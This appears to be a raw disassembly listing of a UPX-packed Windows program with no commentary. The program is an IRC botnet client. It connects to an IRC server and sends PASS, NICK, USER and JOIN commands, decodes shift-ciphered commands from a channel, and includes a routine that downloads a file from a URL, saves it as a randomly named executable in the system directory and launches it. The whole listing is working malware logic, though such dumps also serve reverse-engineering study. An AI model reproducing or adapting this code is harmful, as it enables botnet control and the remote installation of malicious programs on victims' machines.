mov [esp+0ACh+arg_11EC], ecx
or ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
mov [esp+0ACh+arg_11F0], edx
mov edx, ecx
mov esi, offset loc_404120
lea edi, [esp+0ACh+arg_11FC]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
lea esi, [esp+0ACh+arg_4541]
loc_401B9F: ; CODE XREF: sub_4016E0+4D5�j
mov cl, [esp+eax+0ACh+arg_6D4]
inc eax
mov [esi-1], cl
mov byte ptr [esi], 0
add esi, 2
cmp eax, 0DACh
jl short loc_401B9F
mov ecx, 714h
mov eax, 31313131h
lea edi, [esp+0ACh+arg_609C]
mov [esp+0ACh+arg_6098], 0
rep stosd
stosw
mov ecx, 714h
mov eax, 31313131h
lea edi, [esp+0ACh+arg_2468]
mov [esp+0ACh+arg_6099], 0
rep stosd
stosw
jmp loc_40199F
; ---------------------------------------------------------------------------
loc_401BF6: ; CODE XREF: sub_4016E0+368�j
mov ecx, 1Fh
mov esi, offset dword_404780
lea edi, [esp+120h+arg_1410]
push 0
rep movsd
mov ecx, 1F4h
lea esi, [esp+124h+arg_660]
lea edi, [esp+124h+arg_148C]
lea eax, [esp+124h+arg_1410]
rep movsd
mov ecx, 24h
mov esi, offset off_404800
lea edi, [esp+124h+arg_1C5C]
push 0CF8h
push eax
push ebp
rep movsd
mov [esp+130h+arg_2107], 0
call dword_401148 ; send
loc_401C4F: ; CODE XREF: sub_4016E0+425�j
push 1F4h
call ebx ; Sleep
mov [esp+134h+var_11C], 0
loc_401C5E: ; CODE XREF: sub_4016E0+1CC�j
; sub_4016E0+1FD�j ...
push 2
push ebp
call dword_40113C ; shutdown
loc_401C67: ; CODE XREF: sub_4016E0+182�j
push ebp
call dword_401140 ; closesocket
mov eax, [esp+140h+var_128]
pop edi
pop ebx
pop esi
pop ebp
add esp, 8214h
retn
; ---------------------------------------------------------------------------
loc_401C7D: ; CODE XREF: sub_4016E0+38�j
mov eax, esi
pop esi
pop ebp
add esp, 8214h
retn
sub_4016E0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C90 proc near ; CODE XREF: sub_401D40+26�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 4
arg_4 = dword ptr 8
sub esp, 38h
mov ecx, 6
push ebx
push esi
push edi
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [esp+44h+var_38]
rep movsd
movsw
movsb
mov ecx, 6
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [esp+44h+var_1C]
rep movsd
movsw
movsb
mov edi, [esp+44h+arg_4]
test edi, edi
jge short loc_401CC7
add edi, 1Ah
loc_401CC7: ; CODE XREF: sub_401C90+32�j
mov bl, [esp+44h+arg_0]
lea eax, [esp+44h+var_38]
movsx esi, bl
push esi
push eax
call sub_4036C0 ; strchr
add esp, 8
test eax, eax
jz short loc_401CFB
lea ecx, [esp+44h+var_38]
sub eax, ecx
mov ecx, 1Ah
add eax, edi
pop edi
cdq
idiv ecx
pop esi
pop ebx
mov al, [esp+edx+38h+var_38]
add esp, 38h
retn
; ---------------------------------------------------------------------------
loc_401CFB: ; CODE XREF: sub_401C90+4E�j
lea edx, [esp+44h+var_1C]
push esi
push edx
call sub_4036C0 ; strchr
add esp, 8
test eax, eax
jz short loc_401D28
lea ecx, [esp+44h+var_1C]
sub eax, ecx
mov ecx, 1Ah
add eax, edi
pop edi
cdq
idiv ecx
pop esi
pop ebx
mov al, [esp+edx+38h+var_1C]
add esp, 38h
retn
; ---------------------------------------------------------------------------
loc_401D28: ; CODE XREF: sub_401C90+7B�j
pop edi
mov al, bl
pop esi
pop ebx
add esp, 38h
retn
sub_401C90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401D40 proc near ; CODE XREF: sub_4028D0+64�p
; sub_4028D0+95�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
mov esi, [esp+0Ch+arg_8]
mov bl, [ebp+0]
test bl, bl
jz short loc_401D9F
push edi
mov edi, [esp+10h+arg_0]
loc_401D57: ; CODE XREF: sub_401D40+56�j
mov eax, esi
mov byte ptr [esp+10h+arg_0], bl
mov ecx, [esp+10h+arg_0]
inc ebp
neg eax
push eax
push ecx
call sub_401C90
add esp, 8
mov [edi], al
inc edi
cmp bl, 61h
jl short loc_401D81
cmp bl, 7Ah
jg short loc_401D81
movsx esi, bl
sub esi, 61h
loc_401D81: ; CODE XREF: sub_401D40+34�j
; sub_401D40+39�j
cmp bl, 41h
jl short loc_401D91
cmp bl, 5Ah
jg short loc_401D91
movsx esi, bl
sub esi, 41h
loc_401D91: ; CODE XREF: sub_401D40+44�j
; sub_401D40+49�j
mov bl, [ebp+0]
test bl, bl
jnz short loc_401D57
mov [edi], bl
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401D9F: ; CODE XREF: sub_401D40+10�j
mov edx, [esp+0Ch+arg_0]
pop esi
pop ebp
pop ebx
mov byte ptr [edx], 0
retn
sub_401D40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401DB0 proc near ; CODE XREF: sub_402590+70�p
push esi
mov esi, ecx
push 20000h
call sub_403640
add esp, 4
mov [esi+2Ch], eax
mov eax, esi
pop esi
retn
sub_401DB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401DD0 proc near ; CODE XREF: sub_402590+C9�p
; sub_402590+148�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
mov esi, ecx
push 27h
push eax
lea ecx, [esi+4]
push ecx
call dword_401094 ; lstrcpynA
mov edx, [esp+4+arg_4]
mov [esi+58h], edx
pop esi
retn 8
sub_401DD0 endp
; ---------------------------------------------------------------------------
align 10h
loc_401DF0: ; CODE XREF: UPX0:004036F6�j
push esi
mov esi, ecx
lea eax, [esi+4]
push eax
call sub_403660
mov ecx, [esi+2Ch]
push ecx
call sub_403660
add esp, 8
pop esi
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401E10 proc near ; CODE XREF: sub_402590+11E�p
var_138 = byte ptr -138h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 138h
push ebx
push ebp
push esi
push edi
push 0
push 1
mov esi, ecx
push 2
call dword_401128 ; socket
mov [esi+5Ch], eax
lea eax, [esi+4]
push eax
call sub_402BE0
mov cx, [esi+58h]
add esp, 4
lea edi, [esi+60h]
mov [esi+64h], eax
push ecx
mov word ptr [edi], 2
call dword_40112C ; ntohs
mov edx, [esi+5Ch]
push 10h
push edi
push edx
mov [esi+62h], ax
call dword_401124 ; connect
test eax, eax
jnz loc_40204A
mov ecx, [esi+5Ch]
push eax
mov eax, [esi+2Ch]
push 20000h
push eax
push ecx
call dword_401144 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_40204A
mov edx, [esi+2Ch]
mov ecx, esi
mov byte ptr [edx+eax], 0
mov eax, [esi+2Ch]
push eax
call sub_402090
lea ecx, [esp+148h+var_138]
push 9
push ecx
call sub_402B30
mov ebp, dword_4010E8
lea edx, [esp+150h+var_138]
push edx
lea eax, [esp+154h+var_12C]
push offset aPassS ; "PASS %s\r\n"
push eax
call ebp ; wsprintfA
mov ebx, dword_4010B8
add esp, 14h
push 64h
call ebx ; Sleep
lea ecx, [esp+148h+var_12C]
push 0
push ecx
call dword_4010B4 ; lstrlenA
push eax
mov eax, [esi+5Ch]
lea edx, [esp+14Ch+var_128]
push edx
push eax
call dword_401148 ; send
mov edi, [esp+148h+arg_0]
lea ecx, [esp+148h+var_12C]
push edi
push offset aNickS ; "NICK %s\r\n"
push ecx
call ebp ; wsprintfA
add esp, 0Ch
push 64h
call ebx ; Sleep
lea edx, [esp+148h+var_12C]
push 0
push edx
call dword_4010B4 ; lstrlenA
mov ecx, [esi+5Ch]
push eax
lea eax, [esp+14Ch+var_128]
push eax
push ecx
call dword_401148 ; send
mov edx, [esi+2Ch]
mov eax, [esi+5Ch]
push 0
push 20000h
push edx
push eax
call dword_401144 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_40204A
mov ecx, [esi+2Ch]
push 64h
mov byte ptr [ecx+eax], 0
call ebx ; Sleep
mov edx, [esi+2Ch]
mov ecx, esi
push edx
call sub_402090
mov eax, [esi+2Ch]
push offset aAlready ; "already"
push eax
call sub_4036C6 ; strstr
add esp, 8
test eax, eax
jz loc_401FF5
loc_401F6B: ; CODE XREF: sub_401E10+1DF�j
mov ecx, [esp+148h+arg_4]
push ecx
push edi
call sub_402B30
push edi
lea edx, [esp+154h+var_12C]
push offset aNickS ; "NICK %s\r\n"
push edx
call ebp ; wsprintfA
add esp, 14h
push 64h
call ebx ; Sleep
lea eax, [esp+148h+var_12C]
push 0
push eax
call dword_4010B4 ; lstrlenA
mov edx, [esi+5Ch]
lea ecx, [esp+148h+var_128]
push eax
push ecx
push edx
call dword_401148 ; send
mov eax, [esi+2Ch]
mov ecx, [esi+5Ch]
push 0
push 20000h
push eax
push ecx
call dword_401144 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz loc_40204A
mov edx, [esi+2Ch]
mov ecx, esi
mov byte ptr [edx+eax], 0
mov eax, [esi+2Ch]
push eax
call sub_402090
mov ecx, [esi+2Ch]
push offset aAlready ; "already"
push ecx
call sub_4036C6 ; strstr
add esp, 8
test eax, eax
jnz loc_401F6B
loc_401FF5: ; CODE XREF: sub_401E10+155�j
mov edx, [esp+148h+arg_8]
lea eax, [esp+148h+var_12C]
push edx
push edi
push offset aUserS8S ; "USER %s 8 * :%s\r\n"
push eax
call ebp ; wsprintfA
add esp, 10h
push 64h
call ebx ; Sleep
lea ecx, [esp+148h+var_12C]
push 0
push ecx
call dword_4010B4 ; lstrlenA
push eax
mov eax, [esi+5Ch]
lea edx, [esp+14Ch+var_128]
push edx
push eax
call dword_401148 ; send
mov ecx, [esi+2Ch]
mov edx, [esi+5Ch]
push 0
push 20000h
push ecx
push edx
call dword_401144 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_402066
loc_40204A: ; CODE XREF: sub_401E10+50�j
; sub_401E10+6F�j ...
mov eax, [esi+5Ch]
push eax
call dword_401140 ; closesocket
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
add esp, 138h
retn 0Ch
; ---------------------------------------------------------------------------
loc_402066: ; CODE XREF: sub_401E10+238�j
mov ecx, [esi+2Ch]
mov byte ptr [ecx+eax], 0
mov edx, [esi+2Ch]
push edx
mov ecx, esi
call sub_402090
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 138h
retn 0Ch
sub_401E10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402090 proc near ; CODE XREF: sub_401E10+82�p
; sub_401E10+13D�p ...
var_190 = byte ptr -190h
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub esp, 190h
push ebx
push esi
push edi
push offset aPing ; "PING"
mov ebx, ecx
push eax
call sub_4036C6 ; strstr
add esp, 8
test eax, eax
jz short loc_402112
mov edi, dword_4010B4
lea esi, [eax+4]
push esi
call edi ; lstrlenA
dec eax
cmp eax, 63h
jle short loc_4020D4
pop edi
pop esi
mov eax, 1
pop ebx
add esp, 190h
retn 4
; ---------------------------------------------------------------------------
loc_4020D4: ; CODE XREF: sub_402090+31�j
push eax
lea ecx, [esp+1A0h+var_190]
push esi
push ecx
call dword_401094 ; lstrcpynA
lea edx, [esp+19Ch+var_190]
lea eax, [esp+19Ch+var_12C]
push edx
push offset aPongS ; "PONG%s\r\n"
push eax
call dword_4010E8 ; wsprintfA
add esp, 0Ch
lea ecx, [esp+19Ch+var_12C]
push 0
push ecx
call edi ; lstrlenA
push eax
mov eax, [ebx+5Ch]
lea edx, [esp+1A0h+var_128]
push edx
push eax
call dword_401148 ; send
loc_402112: ; CODE XREF: sub_402090+1F�j
pop edi
pop esi
xor eax, eax
pop ebx
add esp, 190h
retn 4
sub_402090 endp
; =============== S U B R O U T I N E =======================================
sub_402120 proc near ; CODE XREF: sub_402590+16C�p
; sub_402590+18F�p
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
sub esp, 12Ch
lea eax, [esp+12Ch+var_12C]
push ebx
mov ebx, [esp+130h+arg_0]
push esi
push edi
push ebx
push offset aJoinS ; "JOIN %s\r\n"
mov esi, ecx
push eax
call dword_4010E8 ; wsprintfA
mov edi, dword_4010B8
add esp, 0Ch
push 64h
call edi ; Sleep
lea ecx, [esp+138h+var_12C]
push 0
push ecx
call dword_4010B4 ; lstrlenA
push eax
mov eax, [esi+5Ch]
lea edx, [esp+13Ch+var_128]
push edx
push eax
call dword_401148 ; send
push 64h
call edi ; Sleep
mov ecx, [esi+2Ch]
mov edx, [esi+5Ch]
push 0
push 20000h
push ecx
push edx
call dword_401144 ; recv
mov ecx, [esi+2Ch]
mov [esi], eax
mov byte ptr [ecx+eax], 0
mov eax, [esi]
cmp eax, 0FFFFFFFFh
jz short loc_402210
test eax, eax
jz short loc_402210
push 64h
call edi ; Sleep
mov edx, [esi+2Ch]
mov ecx, esi
push edx
call sub_402090
mov eax, [esi+2Ch]
push offset a451 ; "451"
push eax
call sub_4036C6 ; strstr
add esp, 8
test eax, eax
jz short loc_4021CF
pop edi
pop esi
mov eax, 3
pop ebx
add esp, 12Ch
retn 4
; ---------------------------------------------------------------------------
loc_4021CF: ; CODE XREF: sub_402120+9C�j
mov ecx, [esi+2Ch]
push offset aPing ; "PING"
push ecx
call sub_4036C6 ; strstr
add esp, 8
test eax, eax
jz short loc_4021F5
pop edi
pop esi
mov eax, 4
pop ebx
add esp, 12Ch
retn 4
; ---------------------------------------------------------------------------
loc_4021F5: ; CODE XREF: sub_402120+C2�j
push 23h
add esi, 30h
push ebx
push esi
call dword_401094 ; lstrcpynA
pop edi
pop esi
xor eax, eax
pop ebx
add esp, 12Ch
retn 4
; ---------------------------------------------------------------------------
loc_402210: ; CODE XREF: sub_402120+74�j
; sub_402120+78�j
pop edi
pop esi
mov eax, 2
pop ebx
add esp, 12Ch
retn 4
sub_402120 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402230 proc near ; CODE XREF: sub_4022A0+AF�p
; sub_402590+1CA�p ...
var_14C = byte ptr -14Ch
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
sub esp, 14Ch
push esi
mov esi, ecx
call sub_403680 ; rand
sub eax, 3
and eax, 7
push eax
lea eax, [esp+154h+var_14C]
push eax
call sub_402B30
lea ecx, [esp+158h+var_14C]
lea edx, [esp+158h+var_12C]
push ecx
push offset aQuitS ; "QUIT %s\r\n"
push edx
call dword_4010E8 ; wsprintfA
add esp, 14h
lea eax, [esp+150h+var_12C]
push 0
push eax
call dword_4010B4 ; lstrlenA
mov edx, [esi+5Ch]
lea ecx, [esp+150h+var_128]
push eax
push ecx
push edx
call dword_401148 ; send
mov eax, [esi+5Ch]
push eax
call dword_401140 ; closesocket
xor eax, eax
pop esi
add esp, 14Ch
retn
sub_402230 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022A0 proc near ; CODE XREF: sub_402590+1B2�p
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_3C = byte ptr -3Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_4022A0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 134h
push ebx
mov ebx, dword_401078
push esi
push edi
mov esi, ecx
mov [ebp+var_10], esp
mov [ebp+var_18], esi
mov [ebp+var_28], offset aHi ; "hi :)"
mov [ebp+var_24], offset aHehe ; "hehe"
mov [ebp+var_20], offset aCool ; "cool!"
mov [ebp+var_1C], offset aYo ; "yo!"
call ebx ; GetTickCount
mov [ebp+var_14], eax
mov eax, [esi+5Ch]
mov [ebp+var_140], 1
mov [ebp+var_13C], eax
loc_402303: ; CODE XREF: sub_4022A0+1B4�j
call sub_402C70
test eax, eax
jz short loc_402354
push 0
push 0
lea ecx, [ebp+var_140]
push 0
push ecx
push 1
call dword_40111C ; select
cmp eax, 0FFFFFFFFh
jz short loc_402354
mov [ebp+var_4], 0
call ebx ; GetTickCount
mov ecx, [ebp+var_14]
sub eax, ecx
mov ecx, [ebp+arg_0]
lea ecx, [ecx+ecx*2]
lea ecx, [ecx+ecx*4]
lea ecx, [ecx+ecx*4]
lea ecx, [ecx+ecx*4]
lea edx, [ecx+ecx*4]
shl edx, 5
cmp eax, edx
jbe short loc_402373
mov ecx, esi
call sub_402230
loc_402354: ; CODE XREF: sub_4022A0+6A�j
; sub_4022A0+84�j ...
mov ecx, [esi+5Ch]
push ecx
call dword_401140 ; closesocket
xor eax, eax
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_402373: ; CODE XREF: sub_4022A0+AB�j
mov eax, [esi+2Ch]
mov ecx, [esi+5Ch]
push 0
push 20000h
push eax
push ecx
call dword_401144 ; recv
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_4023A7
loc_40238F: ; CODE XREF: UPX0:0040246C�j
; DATA XREF: sub_402459+D�o
mov ecx, [ebp+var_C]
pop edi
pop esi
mov eax, 1
mov large fs:0, ecx
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_4023A7: ; CODE XREF: sub_4022A0+ED�j
mov edx, [esi+2Ch]
push 64h
mov byte ptr [eax+edx], 0
call dword_4010B8 ; Sleep
mov eax, [esi+2Ch]
mov ecx, esi
push eax
call sub_402090
mov ecx, [esi+2Ch]
push ecx
mov ecx, esi
call sub_4028D0
call sub_403680 ; rand
mov edi, eax
and edi, 1Fh
jnz short loc_4023F0
call sub_403680 ; rand
and eax, 3
mov ecx, esi
mov edx, [ebp+eax*4+var_28]
lea eax, [esi+30h]
push edx
push eax
call sub_402480
loc_4023F0: ; CODE XREF: sub_4022A0+136�j
cmp edi, 1
jnz short loc_402438
call sub_403680 ; rand
add eax, 2
lea ecx, [ebp+var_3C]
and eax, 7
push eax
push ecx
call sub_402B30
add esp, 8
lea edx, [ebp+var_3C]
push edx
call dword_4010B4 ; lstrlenA
mov edi, eax
sub edi, 3
call sub_403680 ; rand
cdq
idiv edi
lea eax, [ebp+var_3C]
lea ecx, [esi+30h]
push eax
push ecx
mov ecx, esi
mov [ebp+edx+var_3C], 20h
call sub_402480
loc_402438: ; CODE XREF: sub_4022A0+153�j
mov [ebp+var_4], 0FFFFFFFFh
call sub_402C70
test eax, eax
jz loc_402354
push 64h
call dword_4010B8 ; Sleep
jmp loc_402303
sub_4022A0 endp
; =============== S U B R O U T I N E =======================================
sub_402459 proc near ; DATA XREF: UPX0:0040375C�o
mov edx, [ebp-18h]
mov eax, [edx+5Ch]
push eax
call dword_401140 ; closesocket
mov eax, offset loc_40238F
retn
sub_402459 endp
; ---------------------------------------------------------------------------
jmp loc_40238F
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402480 proc near ; CODE XREF: sub_4022A0+14B�p
; sub_4022A0+193�p ...
var_12C = byte ptr -12Ch
var_128 = byte ptr -128h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 12Ch
push ebx
mov ebx, [esp+130h+arg_0]
push ebp
push esi
mov esi, dword_4010B4
push edi
mov edi, ecx
push ebx
call esi ; lstrlenA
mov ebp, eax
mov eax, [esp+13Ch+arg_4]
push eax
call esi ; lstrlenA
add ebp, eax
cmp ebp, 10Eh
jle short loc_4024C4
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
add esp, 12Ch
retn 8
; ---------------------------------------------------------------------------
loc_4024C4: ; CODE XREF: sub_402480+30�j
mov ecx, [esp+13Ch+arg_4]
lea edx, [esp+13Ch+var_12C]
push ecx
push ebx
push offset aPrivmsgSS ; "PRIVMSG %s %s\r\n"
push edx
call dword_4010E8 ; wsprintfA
add esp, 10h
push 64h
call dword_4010B8 ; Sleep
lea eax, [esp+13Ch+var_12C]
push 0
push eax
call esi ; lstrlenA
mov edx, [edi+5Ch]
lea ecx, [esp+13Ch+var_128]
push eax
push ecx
push edx
call dword_401148 ; send
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 12Ch
retn 8
sub_402480 endp
; =============== S U B R O U T I N E =======================================
sub_402510 proc near ; CODE XREF: sub_402590+96�p
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_E = dword ptr -0Eh
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 10h
lea eax, [esp+10h+var_10]
push eax
call dword_401084 ; GetSystemTime
mov eax, [esp+14h+var_14]
mov edx, [esp+14h+var_14+2]
and eax, 0FFFFh
and edx, 0FFFFh
lea ecx, [eax+eax*2]
mov eax, [esp+14h+var_E]
add ecx, edx
and eax, 0FFFFh
add ecx, eax
push ecx
call sub_403686 ; srand
mov eax, [esp+18h]
push 7
mov byte ptr [eax], 23h
inc eax
push eax
call sub_402B30
mov ecx, [esp+20h+arg_0]
push 8
push ecx
call sub_402B30
add esp, 14h
call sub_403680 ; rand
cdq
mov ecx, 1Ah
idiv ecx
mov eax, [esp+14h+arg_4]
mov [eax], edx
call dword_401078 ; GetTickCount
push eax
call sub_403686 ; srand
add esp, 14h
retn
sub_402510 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_402590 proc near ; DATA XREF: UPX0:00402EF0�o
var_BC = byte ptr -0BCh
var_4C = byte ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_18 = byte ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_402590
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0B0h
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_28], eax
popa
mov [ebp+var_2C], esp
call dword_401078 ; GetTickCount
mov ecx, [ebp+var_2C]
imul ecx, [ebp+var_28]
add eax, ecx
push eax
call sub_403686 ; srand
call sub_403680 ; rand
cdq
mov ecx, 6
idiv ecx
add edx, 4
push edx
lea edx, [ebp+var_18]
push edx
call sub_402B30
mov eax, dword_404FA0
add esp, 0Ch
test eax, eax
jz short loc_4025FA
mov [ebp+var_18], 5Fh
loc_4025FA: ; CODE XREF: sub_402590+64�j
lea ecx, [ebp+var_BC]
call sub_401DB0
mov edi, dword_4010B8
mov ebx, dword_401074
mov [ebp+var_4], 0
loc_402618: ; CODE XREF: sub_402590+1BE�j
; sub_402590+1F1�j
push offset dword_404F3C
lea eax, [ebp+var_24]
push offset dword_404F40
push eax
call sub_402510
add esp, 0Ch
call sub_402C70
test eax, eax
jnz short loc_402647
loc_402637: ; CODE XREF: sub_402590+B5�j
push 3E8h
call edi ; Sleep
call sub_402C70
test eax, eax
jz short loc_402637
loc_402647: ; CODE XREF: sub_402590+A5�j
mov ecx, off_404B0C
push 1A0Bh
push ecx
lea ecx, [ebp+var_BC]
call sub_401DD0
xor esi, esi
loc_402660: ; CODE XREF: sub_402590+151�j
call sub_402C70
test eax, eax
jz loc_40275F
lea edx, [ebp+var_4C]
push offset aQ ; "q"
push edx
call ebx ; lstrcpyA
call sub_403680 ; rand
cdq
mov ecx, 7
idiv ecx
add edx, 5
push edx
lea edx, [ebp+var_4C]
push edx
call sub_402B30
add esp, 8
lea eax, [ebp+var_4C]
lea ecx, [ebp+var_18]
push eax
push ecx
call dword_4010B4 ; lstrlenA
lea edx, [ebp+var_18]
push eax
push edx
lea ecx, [ebp+var_BC]
call sub_401E10
test eax, eax
jz short loc_4026E9
push 1A0Bh
call sub_403680 ; rand
xor edx, edx
mov ecx, 0Bh
div ecx
lea ecx, [ebp+var_BC]
mov edx, off_404B0C[edx*4]
push edx
call sub_401DD0
inc esi
cmp esi, 16h
jb loc_402660
jmp short loc_40275F
; ---------------------------------------------------------------------------
loc_4026E9: ; CODE XREF: sub_402590+125�j
call sub_402C70
test eax, eax
jz short loc_40275F
lea eax, [ebp+var_24]
lea ecx, [ebp+var_BC]
push eax
call sub_402120
test eax, eax
jz short loc_402728
loc_402705: ; CODE XREF: sub_402590+196�j
push 3E8h
call edi ; Sleep
call sub_402C70
test eax, eax
jz short loc_402728
lea ecx, [ebp+var_24]
push ecx
lea ecx, [ebp+var_BC]
call sub_402120
test eax, eax
jnz short loc_402705
loc_402728: ; CODE XREF: sub_402590+173�j
; sub_402590+183�j
call sub_403680 ; rand
cdq
mov ecx, 320h
idiv ecx
lea ecx, [ebp+var_BC]
add edx, 578h
push edx
call sub_4022A0
call sub_402C70
test eax, eax
jz loc_402618
lea ecx, [ebp+var_BC]
call sub_402230
loc_40275F: ; CODE XREF: sub_402590+D7�j
; sub_402590+157�j ...
call sub_403680 ; rand
cdq
mov ecx, 1Eh
idiv ecx
lea eax, [edx+edx*2]
lea eax, [eax+eax*4]
lea eax, [eax+eax*4]
lea eax, [eax+eax*4]
lea edx, [eax+eax*4]
shl edx, 5
push edx
call edi ; Sleep
jmp loc_402618
sub_402590 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402790 proc near ; CODE XREF: sub_4028D0+FA�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_104 = byte ptr -104h
arg_0 = dword ptr 4
sub esp, 10Ch
push ebx
push esi
push edi
push 0
push 0
push 0
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_4010F8 ; InternetOpenA
mov ebx, eax
test ebx, ebx
jnz short loc_4027C1
pop edi
pop esi
mov eax, 1
pop ebx
add esp, 10Ch
retn
; ---------------------------------------------------------------------------
loc_4027C1: ; CODE XREF: sub_402790+20�j
lea eax, [esp+118h+var_104]
push 104h
push eax
call dword_40109C ; GetSystemDirectoryA
mov esi, dword_4010BC
lea ecx, [esp+118h+var_104]
push offset asc_404D18 ; "\\"
push ecx
call esi ; lstrcatA
lea edx, [esp+118h+var_104]
push 6
push edx
call dword_4010B4 ; lstrlenA
lea eax, [esp+eax+120h+var_108]
push eax
call sub_402B30
add esp, 8
lea ecx, [esp+11Ch+var_108]
push offset a_exe ; ".exe"
push ecx
call esi ; lstrcatA
push 0
push 0
push 2
push 0
push 0
lea edx, [esp+12Ch+var_104]
push 40000000h
push edx
call dword_401090 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_402839
pop edi
pop esi
mov eax, 2
pop ebx
add esp, 10Ch
retn
; ---------------------------------------------------------------------------
loc_402839: ; CODE XREF: sub_402790+98�j
mov eax, [esp+118h+arg_0]
push 0
push 0
push 0
push 0
push eax
push ebx
call dword_4010F0 ; InternetOpenUrlA
mov ebx, eax
test ebx, ebx
jnz short loc_40286C
push edi
call dword_401088 ; CloseHandle
pop edi
pop esi
mov eax, 3
pop ebx
add esp, 10Ch
retn
; ---------------------------------------------------------------------------
loc_40286C: ; CODE XREF: sub_402790+C4�j
push 100000h
call sub_403640
add esp, 4
lea ecx, [esp+118h+var_10C]
mov esi, eax
push ecx
push 100000h
push esi
push ebx
call dword_4010F4 ; InternetReadFile
mov eax, [esp+118h+var_10C]
lea edx, [esp+118h+var_108]
push 0
push edx
push eax
push esi
push edi
call dword_40108C ; WriteFile
push edi
call dword_401088 ; CloseHandle
lea ecx, [esp+118h+var_104]
push 5
push ecx
call sub_402B70
push esi
call sub_403660
add esp, 0Ch
xor eax, eax
pop edi
pop esi
pop ebx
add esp, 10Ch
retn
sub_402790 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4028D0 proc near ; CODE XREF: sub_4022A0+127�p
var_268 = dword ptr -268h
var_264 = byte ptr -264h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 4
sub esp, 268h
push ebx
push ebp
mov ebp, [esp+270h+arg_0]
push esi
push edi
push offset dword_404F40
mov [esp+27Ch+var_268], ecx
push ebp
call sub_4036C6 ; strstr
mov edi, eax
add esp, 8
test edi, edi
jz loc_402A73
push edi
call dword_4010B4 ; lstrlenA
cmp eax, 0Ah
jle loc_402A73
lea ebx, [edi+8]
push 7Ch
push ebx
call sub_4036C0 ; strchr
mov esi, eax
add esp, 8
test esi, esi
jz loc_402A73
mov byte ptr [esi], 0
mov eax, dword_404F3C
push eax
lea ecx, [esp+27Ch+var_200]
push ebx
push ecx
call sub_401D40
mov byte ptr [esi], 7Ch
inc esi
push 7Ch
push esi
call sub_4036C0 ; strchr
mov ebx, eax
add esp, 14h
test ebx, ebx
jz loc_402A73
mov byte ptr [ebx], 0
mov edx, dword_404F3C
push edx
lea eax, [esp+27Ch+var_100]
push esi
push eax
call sub_401D40
mov ebp, dword_4010C4
add esp, 0Ch
lea ecx, [esp+278h+var_200]
